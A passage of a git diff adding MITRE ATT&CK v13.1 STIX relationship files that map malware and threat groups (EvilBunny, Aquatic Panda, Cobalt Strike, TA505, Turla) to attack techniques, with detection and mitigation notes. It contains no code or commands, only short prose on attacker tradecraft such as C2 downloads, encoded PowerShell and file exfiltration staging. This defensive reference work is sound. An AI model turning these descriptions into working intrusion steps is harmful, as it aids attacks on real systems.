used a compromised O365 administrator account to create a new Service Principal.(Citation: CrowdStrike StellarParticle January 2022)", + "relationship_type": "uses", + "source_ref": "campaign--808d6b30-df4e-4341-8248-724da4bac650", + "target_ref": "attack-pattern--f232fa7a-025c-4d43-abc7-318e81a73d65", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json new file mode 100644 index 0000000000000000000000000000000000000000..bbe9b938d9147cd845abc142e28021e3e207cb0b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--04202c95-0f95-471e-88f3-9cba23febd42", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0109ee05-c2a9-4dcf-80d1-f859500c97c9", + "type": "relationship", + "created": "2019-06-28T17:40:32.413Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Cyphort EvilBunny Dec 2014", + "url": "https://web.archive.org/web/20150311013500/http://www.cyphort.com/evilbunny-malware-instrumented-lua/", + "description": "Marschalek, M.. (2014, December 16). EvilBunny: Malware Instrumented By Lua. Retrieved June 28, 2019." + } + ], + "modified": "2019-07-01T18:16:33.116Z", + "description": "[EvilBunny](https://attack.mitre.org/software/S0396) has downloaded additional Lua scripts from the C2.(Citation: Cyphort EvilBunny Dec 2014)", + "relationship_type": "uses", + "source_ref": "malware--a8a778f5-0035-4870-bb25-53dc05029586", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json new file mode 100644 index 0000000000000000000000000000000000000000..70cfb76a1b67a638210b188a0a2618df4e796ad2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--9992ddbe-f3f5-46b9-a489-b180d776f6dd", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--010ee4a6-41cb-4ce5-8dc2-9a1d1003ec4e", + "created": "2022-04-10T18:32:35.248Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CrowdStrike AQUATIC PANDA December 2021", + "description": "Wiley, B. et al. (2021, December 29). OverWatch Exposes AQUATIC PANDA in Possession of Log4Shell Exploit Tools During Hands-on Intrusion Attempt. Retrieved January 18, 2022.", + "url": "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T21:16:58.413Z", + "description": "[Aquatic Panda](https://attack.mitre.org/groups/G0143) has encoded PowerShell commands in Base64.(Citation: CrowdStrike AQUATIC PANDA December 2021)", + "relationship_type": "uses", + "source_ref": "intrusion-set--64b52e7d-b2c4-4a02-9372-08a463f5dc11", + "target_ref": "attack-pattern--d511a6f6-4a33-41d5-bc95-c343875d1377", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json new file mode 100644 index 0000000000000000000000000000000000000000..29e18137e638fbb453a4d781176e134e0dc1fc8b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0110e04e-5812-4b69-9700-037b52d3ebb4.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--828feda8-7fcb-47a5-825f-94de6de2250e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--0110e04e-5812-4b69-9700-037b52d3ebb4", + "created": "2022-04-11T17:47:16.063Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Trend Micro Iron Tiger April 2021", + "url": "https://www.trendmicro.com/en_us/research/21/d/iron-tiger-apt-updates-toolkit-with-evolved-sysupdate-malware-va.html", + "description": "Lunghi, D. and Lu, K. (2021, April 9). Iron Tiger APT Updates Toolkit With Evolved SysUpdate Malware. Retrieved November 12, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Pandora](https://attack.mitre.org/software/S0664) can load additional drivers and files onto a victim machine.(Citation: Trend Micro Iron Tiger April 2021)", + "modified": "2022-04-11T17:47:16.063Z", + "relationship_type": "uses", + "source_ref": "malware--a545456a-f9a7-47ad-9ea6-8b017def38d1", + "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json new file mode 100644 index 0000000000000000000000000000000000000000..efc4a9a474fedf0803f3aa5bb33ce35ef7d2641b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01202a82-56cc-4770-abf1-1a37c8717dba.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--21970b49-6144-4cdc-9161-2049df04e019", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01202a82-56cc-4770-abf1-1a37c8717dba", + "type": "relationship", + "created": "2020-12-07T20:11:44.020Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Crutch December 2020", + "url": "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/", + "description": "Faou, M. (2020, December 2). Turla Crutch: Keeping the \u201cback door\u201d open. Retrieved December 4, 2020." + } + ], + "modified": "2020-12-07T20:11:44.020Z", + "description": "[Crutch](https://attack.mitre.org/software/S0538) has used the WinRAR utility to compress and encrypt stolen files.(Citation: ESET Crutch December 2020)", + "relationship_type": "uses", + "source_ref": "malware--925a6c52-5cf0-4fec-99de-b0d6917d8593", + "target_ref": "attack-pattern--00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json new file mode 100644 index 0000000000000000000000000000000000000000..fbaa4c6ce7de7c9dec06a771a850f476f106311c --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--1c95cab4-086d-43e3-948f-11fc633515cc", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--01253fc1-ee00-438a-ba98-fc8db655b7d3", + "created": "2022-10-13T16:09:34.638Z", + "revoked": false, + "external_references": [ + { + "source_name": "NCC Group TA505", + "description": "Terefos, A. (2020, November 18). TA505: A Brief History of Their Time. Retrieved July 14, 2022.", + "url": "https://research.nccgroup.com/2020/11/18/ta505-a-brief-history-of-their-time/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-13T16:09:34.638Z", + "description": "(Citation: NCC Group TA505)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "target_ref": "tool--f59508a6-3615-47c3-b493-6676e1a39a87", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json new file mode 100644 index 0000000000000000000000000000000000000000..f69ff2ce15b9e6dfb5afe48a0c3f8d6bf8123e17 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--aa049d4f-2f4b-4b2f-a5d2-af9ca23af24f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--012617bd-bdb5-434f-996c-bea7afe1b8a5", + "type": "relationship", + "created": "2021-12-01T18:49:06.980Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Gelsemium June 2021", + "url": "https://www.welivesecurity.com/wp-content/uploads/2021/06/eset_gelsemium.pdf", + "description": "Dupuy, T. and Faou, M. (2021, June). Gelsemium. Retrieved November 30, 2021." + } + ], + "modified": "2021-12-01T18:49:06.980Z", + "description": "[Chrommme](https://attack.mitre.org/software/S0667) can enumerate the IP address of a compromised host.(Citation: ESET Gelsemium June 2021)", + "relationship_type": "uses", + "source_ref": "malware--579607c2-d046-40df-99ab-beb479c37a2a", + "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json new file mode 100644 index 0000000000000000000000000000000000000000..1e2e839c7c730c11c5b992c059b82c92f74b656f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--e947b564-125c-4b3f-88b8-70cd9552fd8b", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--0127e0a7-fce7-41f8-bdba-ed634e0eb68f", + "type": "relationship", + "created": "2022-03-30T14:26:51.860Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.860Z", + "description": " Monitor for many failed authentication attempts across various accounts that may result from password spraying attempts. It is difficult to detect when hashes are cracked, since this is generally done outside the scope of the target network. (ex: Windows EID 4625 or 5379)", + "source_ref": "x-mitre-data-component--a953ca55-921a-44f7-9b8d-3d40141aa17e", + "target_ref": "attack-pattern--1d24cdee-9ea2-4189-b08e-af110bf2435d", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json new file mode 100644 index 0000000000000000000000000000000000000000..df16e734cb8eae83ef5765e33b83876f11d25ac8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--01292102-1f89-4358-b62c-bc0afd49fc52.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--50c2e78f-216d-43d8-a3c8-3d3938699431", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--01292102-1f89-4358-b62c-bc0afd49fc52", + "type": "relationship", + "created": "2020-03-17T02:18:35.198Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://researchcenter.paloaltonetworks.com/2018/07/unit42-oilrig-targets-technology-service-provider-government-agency-quadagent/", + "description": "Lee, B., Falcone, R. (2018, July 25). OilRig Targets Technology Service Provider and Government Agency with QUADAGENT. Retrieved August 9, 2018.", + "source_name": "Unit 42 QUADAGENT July 2018" + } + ], + "modified": "2020-03-17T02:18:35.198Z", + "description": "[QUADAGENT](https://attack.mitre.org/software/S0269) uses DNS for C2 communications.(Citation: Unit 42 QUADAGENT July 2018)", + "relationship_type": "uses", + "source_ref": "malware--7e6c2a9d-9dc1-4eb0-b27c-91e8076a9d77", + "target_ref": "attack-pattern--1996eef1-ced3-4d7f-bf94-33298cabbf72", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json new file mode 100644 index 0000000000000000000000000000000000000000..21df9c7c750f2fdd78ee1c855b7bbfde1fd0119f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--e582f400-941f-4e90-867a-3191606feb67", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--012af60f-b7bc-4d71-bdf7-6b38a31e3a6f", + "created": "2022-03-30T14:26:51.867Z", + "x_mitre_version": "0.1", + "external_references": [ + { + "source_name": "Sygnia Golden SAML", + "url": "https://www.sygnia.co/golden-saml-advisory", + "description": "Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved January 6, 2021." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Monitor for the use of access tokens to access services such as email that were created using SAML tokens which do not have corresponding 1202 events (i.e. \u201cThe Federation Service validated a new credential\u201d) in the domain.(Citation: Sygnia Golden SAML)", + "modified": "2022-04-14T16:49:49.478Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--ff93f688-d7a4-49cf-9c79-a14454da8428", + "target_ref": "attack-pattern--1f9c2bae-b441-4f66-a8af-b65946ee72f2", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json new file mode 100644 index 0000000000000000000000000000000000000000..d394a9f1640df84b5bb17540ba1edef7baffb9b8 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2.json 
@@ -0,0 +1,33 @@ +{ + "type": "bundle", + "id": "bundle--4448d365-a6c2-47d0-8c36-fb2d0de1220b", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe42b5e6-06dd-4b08-8ef8-31323f8190d2", + "created": "2021-05-28T14:56:24.055Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft PowerShell CLM", + "description": "PowerShell Team. (2017, November 2). PowerShell Constrained Language Mode. Retrieved March 27, 2023.", + "url": "https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-27T17:01:11.404Z", + "description": "Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).(Citation: Microsoft PowerShell CLM)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--47e0e9fe-96ce-4f65-8bb1-8be1feacb5db", + "target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json new file mode 100644 index 0000000000000000000000000000000000000000..d949a6ea90d30b208ac332b7b83d799715a751a9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1.json 
@@ -0,0 +1,38 @@ +{ + "type": "bundle", + "id": "bundle--468cc8d0-c3c8-4cb3-8185-77af41fb2fea", + "spec_version": "2.0", + "objects": [ + { + "type": "relationship", + "id": "relationship--fe57d6a5-09d4-4642-9b71-cfcf9b9e0de1", + "created": "2021-04-07T14:10:22.287Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Talos Cobalt Strike September 2020", + "description": "Mavis, N. (2020, September 21). The Art and Science of Detecting Cobalt Strike. Retrieved April 6, 2021.", + "url": "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf" + }, + { + "source_name": "Cobalt Strike Manual 4.3 November 2020", + "description": "Strategic Cyber LLC. (2020, November 5). Cobalt Strike: Advanced Threat Tactics for Penetration Testers. Retrieved April 13, 2021.", + "url": "https://web.archive.org/web/20210708035426/https://www.cobaltstrike.com/downloads/csmanual43.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-11-30T22:37:12.396Z", + "description": "[Cobalt Strike](https://attack.mitre.org/software/S0154) can hash functions to obfuscate calls to the Windows API and use a public/private key pair to encrypt Beacon session metadata.(Citation: Talos Cobalt Strike September 2020)(Citation: Cobalt Strike Manual 4.3 November 2020)", + "relationship_type": "uses", + "source_ref": "malware--a7881f21-e978-4fe4-af56-92c9416a2616", + "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file 
diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json new file mode 100644 index 0000000000000000000000000000000000000000..6853d4597cb94897b057c9f2da59a7bffb8fc37b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123.json @@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--441d3038-5fb3-4be8-bcfc-6b41ea01193f", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fe8358f5-ead6-4ae7-a88c-831dda8ab123", + "type": "relationship", + "created": "2020-01-24T19:36:42.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2020-01-24T19:36:42.015Z", + "relationship_type": "revoked-by", + "source_ref": "attack-pattern--970cdb5c-02fb-4c38-b17e-d6327cf3c810", + "target_ref": "attack-pattern--4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json new file mode 100644 index 0000000000000000000000000000000000000000..aec69b8807de4bddbb9f61c04c32b05d8104012b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--fdfa8ab7-2dad-41f1-95f9-0f33c15fbf14", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fe9c9381-99d7-4798-ab41-3e5cdbda5e21", + "type": "relationship", + "created": "2018-01-16T16:13:52.465Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "ESET Gazer Aug 2017", + "description": "ESET. (2017, August). Gazing at Gazer: Turla\u2019s new second stage backdoor. Retrieved September 14, 2017.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf" + } + ], + "modified": "2019-07-14T21:04:44.978Z", + "description": "Based on comparison of [Gazer](https://attack.mitre.org/software/S0168) versions, [Turla](https://attack.mitre.org/groups/G0010) made an effort to obfuscate strings in the malware that could be used as IoCs, including the mutex name and named pipe.(Citation: ESET Gazer Aug 2017)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6", + "target_ref": "attack-pattern--b0533c6e-8fea-4788-874f-b799cacc4b92", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json new file mode 100644 index 0000000000000000000000000000000000000000..96d53dbbfb5c30c1be2b1d07969e5c8bf5fbac37 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a.json 
@@ -0,0 +1,23 @@ +{ + "type": "bundle", + "id": "bundle--d5ac8164-7bb7-40e8-93da-ac7ba1a581fa", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fec13b81-c639-4eaa-8d9f-75043a02f46a", + "type": "relationship", + "created": "2022-03-30T14:26:51.869Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2022-03-30T14:26:51.869Z", + "description": "Monitor executed commands and arguments that may forge credential materials that can be used to gain access to web applications or Internet services.", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4", + "relationship_type": "detects", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json new file mode 100644 index 0000000000000000000000000000000000000000..258037cc7cb92c55d6c8ea228c77b01dcdda29fc --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--fee6aca0-dcb7-43b4-a253-66913620631a.json 
@@ -0,0 +1,30 @@ +{ + "type": "bundle", + "id": "bundle--c8584602-71c2-456e-8480-0afe3f450487", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--fee6aca0-dcb7-43b4-a253-66913620631a", + "type": "relationship", + "created": "2020-05-29T19:02:06.766Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Trend Micro TA505 June 2019", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/", + "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020." + } + ], + "modified": "2020-06-15T22:05:43.295Z", + "description": "[TA505](https://attack.mitre.org/groups/G0092) has executed commands using cmd.exe.(Citation: Trend Micro TA505 June 2019)", + "relationship_type": "uses", + "source_ref": "intrusion-set--7eda3dd8-b09b-4705-8090-c2ad9fb8c14d", + "target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json new file mode 100644 index 0000000000000000000000000000000000000000..89c251b869e18d391add194306734cbd963d2d3d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad.json 
@@ -0,0 +1,22 @@ +{ + "type": "bundle", + "id": "bundle--1fa82c97-ca3d-4ad4-89c4-1bbdab866f3e", + "spec_version": "2.0", + "objects": [ + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ff0d8860-9790-4a15-93c7-17f01d63b2ad", + "type": "relationship", + "created": "2019-12-19T19:43:34.933Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "modified": "2019-12-19T19:43:34.933Z", + "relationship_type": "subtechnique-of", + "source_ref": "attack-pattern--16ab6452-c3c1-497c-a47d-206018ca1ada", + "target_ref": "attack-pattern--7f0ca133-88c4-40c6-a62f-b3083a7fbc2e", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json b/cti-ATT-CK-v13.1/enterprise-attack/relationship/relationship--ff3ade9d-2665-4794-bb1e-cb436d790f3f.json new file mode 100644 index 0000000000000000000000000000000000000000..a656aa3eb30a812118a2014bf74af76d9992e351 --- /dev/null +++ 